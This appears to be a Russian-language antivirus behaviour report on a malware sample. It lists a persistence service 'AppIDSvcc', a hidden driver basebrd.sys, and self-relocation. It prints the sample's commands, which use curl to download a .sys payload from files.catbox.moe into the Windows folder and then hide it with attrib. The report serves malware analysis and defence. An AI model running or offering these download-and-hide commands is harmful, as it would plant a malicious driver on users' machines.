Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [HKLM\SYSTEM\CurrentControlSet\Services\AppIDSvcc] 'ImagePath' = '%WINDIR%\Branding\Basebrd\basebrd.sys'
Создает следующие сервисы
- 'AppIDSvcc' %WINDIR%\Branding\Basebrd\basebrd.sys
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\fonts\fa-solid-900.ttf
- nul
Подменяет следующие исполняемые файлы
- <Полный путь к файлу>
Самоперемещается
- из <Полный путь к файлу> в %TEMP%\<Имя файла>.exe.bak
Сетевая активность
UDP
- DNS ASK fi###.catbox.moe
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c cls
- '<SYSTEM32>\cmd.exe' /c curl --silent https://files.catbox.moe/4jdffy.sys --output %WINDIR%\Branding\Basebrd\basebrd.sys >nul 2>&1
- '<SYSTEM32>\curl.exe' --silent https://files.catbox.moe/4jdffy.sys --output %WINDIR%\Branding\Basebrd\basebrd.sys
- '<SYSTEM32>\cmd.exe' /c attrib +h +s %WINDIR%\Branding\Basebrd\basebrd.sys >nul 2>&1
- '<SYSTEM32>\attrib.exe' +h +s %WINDIR%\Branding\Basebrd\basebrd.sys
